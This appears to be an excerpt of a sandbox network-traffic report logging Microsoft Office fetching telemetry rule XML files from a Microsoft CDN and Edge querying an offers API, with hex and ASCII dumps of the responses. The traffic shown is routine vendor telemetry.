                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              21192.168.2.64975113.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:23 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:24 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062224Z-174f7845968l4kp6hC1EWRe8840000000yag0000000047hx
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              22192.168.2.64975013.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:24 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                              x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062224Z-174f78459688l8rvhC1EWRtzr00000000apg000000004t0s
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              23192.168.2.64975313.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062226Z-174f7845968glpgnhC1EWR7uec0000000y90000000001upg
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              24192.168.2.64975413.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 7d88711d-b01e-0002-6507-411b8f000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062226Z-174f7845968pght8hC1EWRyvxg000000015g000000008vny
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              25192.168.2.64975613.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:26 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                              x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062226Z-174f7845968kdththC1EWRzvxn0000000aeg0000000039ku
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:26 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              26192.168.2.64975713.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:28 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:28 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062228Z-174f7845968j6t2phC1EWRcfe80000000y70000000005apf
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              27192.168.2.64975913.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:28 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:28 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                              x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062228Z-174f78459684bddphC1EWRbht40000000xug000000003uw5
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              28192.168.2.64975513.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:28 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:28 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062228Z-174f7845968px8v7hC1EWR08ng0000000ya0000000006pfc
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              29192.168.2.64976894.245.104.564438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:29 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:28 GMT
                                                                                                                                                                                                                                                                                              Server: Microsoft-IIS/10.0
